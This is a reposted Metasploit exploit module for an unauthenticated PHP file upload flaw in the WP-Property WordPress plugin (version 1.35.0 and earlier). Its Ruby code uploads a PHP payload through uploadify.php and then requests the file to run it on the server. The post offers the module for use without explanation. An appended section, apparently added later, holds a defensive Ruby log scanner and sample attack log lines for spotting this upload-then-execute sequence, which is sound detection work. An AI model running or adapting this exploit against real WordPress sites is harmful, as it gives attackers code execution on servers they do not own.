WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    #   http://metasploit.com/framework/
    ##

    require 'msf/core'
    require 'msf/core/exploit/php_exe'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::PhpEXE

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
          'Description'    => %q{
              This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
            plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
            temp directory without authentication, which results in arbitrary code execution.
          },
          'Author'         =>
            [
              'Sammy FORGIT', # initial discovery
              'James Fitts <fitts.james[at]gmail.com>' # metasploit module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'OSVDB', '82656' ],
              [ 'BID', '53787' ],
              [ 'EDB', '18987'],
              [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
            ],
          'Payload'        =>
            {
              'BadChars' => "\x00",
            },
          'Platform'       => 'php',
          'Arch'           => ARCH_PHP,
          'Targets'        =>
            [
              [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
              [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Mar 26 2012'))

        register_options(
          [
            OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
          ], self.class)
      end

      # Reports "Appears" when the plugin's uploadify.php answers with HTTP 200.
      def check
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
        })

        if not res or res.code != 200
          return Exploit::CheckCode::Unknown
        end

        return Exploit::CheckCode::Appears
      end

      def exploit
        uri =  target_uri.path
        uri << '/' if uri[-1,1] != '/'

        peer = "#{rhost}:#{rport}"

        @payload_name = "#{rand_text_alpha(5)}.php"
        php_payload = get_write_exec_payload(:unlink_self=>true)

        # Multipart body: the file part ("Filedata") and the destination "folder" field
        data = Rex::MIME::Message.new
        data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
        data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
        post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

        print_status("#{peer} - Uploading payload #{@payload_name}")
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
          'ctype'  => "multipart/form-data; boundary=#{data.bound}",
          'data'   => post_data
        })

        if not res or res.code != 200 or res.body !~ /#{@payload_name}/
          fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
        end

        # The response body is used as the path of the uploaded file
        upload_uri = res.body

        print_status("#{peer} - Executing payload #{@payload_name}")
        res = send_request_raw({
          'uri'    => upload_uri,
          'method' => 'GET'
        })
      end
    end

Don't ask me what this is or how to use it. I mean, it's msf.
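For defenders, the traffic this module produces is a POST to the plugin's `uploadify.php` followed by a GET for a `.php` file in the same `uploadify/` directory. The sketch below is an added example, not part of the original post or of Metasploit: it scans Apache combined-format access log lines for that sequence. The function name `scan_uploadify`, the log format and the sample lines (documentation-range IPs) are assumptions made for illustration.

```ruby
# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
  203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/aBcDe.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.9 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  198.51.100.9 - - [04/Jan/2013:19:41:12 +0800] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
LOG

LINE_RE       = %r{\A(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) }
UPLOADIFY_DIR = %r{/wp-content/plugins/wp-property/third-party/uploadify/([^/?]*)}i
SCRIPT_EXT    = /\.(php\d?|phtml|phar)\z/

# Returns one finding per suspicious request, in log order.
def scan_uploadify(log_text)
  uploaders = {} # client IP => true once it has POSTed to uploadify.php
  findings  = []
  log_text.each_line do |line|
    m = LINE_RE.match(line) or next
    ip, verb, path, status = m[1], m[2], m[3], m[4].to_i
    d = UPLOADIFY_DIR.match(path) or next
    file = d[1].downcase
    if file == 'uploadify.php'
      next unless verb == 'POST' # a bare GET is only a probe
      uploaders[ip] = true
      findings << { ip: ip, kind: :upload_attempt, path: path, status: status }
    elsif file =~ SCRIPT_EXT
      # Any other script served from the upload directory is unexpected.
      kind = uploaders[ip] ? :upload_then_execute : :script_in_upload_dir
      findings << { ip: ip, kind: kind, path: path, status: status }
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  scan_uploadify(SAMPLE_LOG).each { |f| puts f.inspect }
end
```

Because the module requests its payload with `:unlink_self=>true`, the uploaded file may no longer be on disk after it runs, so the access log can be the only remaining evidence of the sequence.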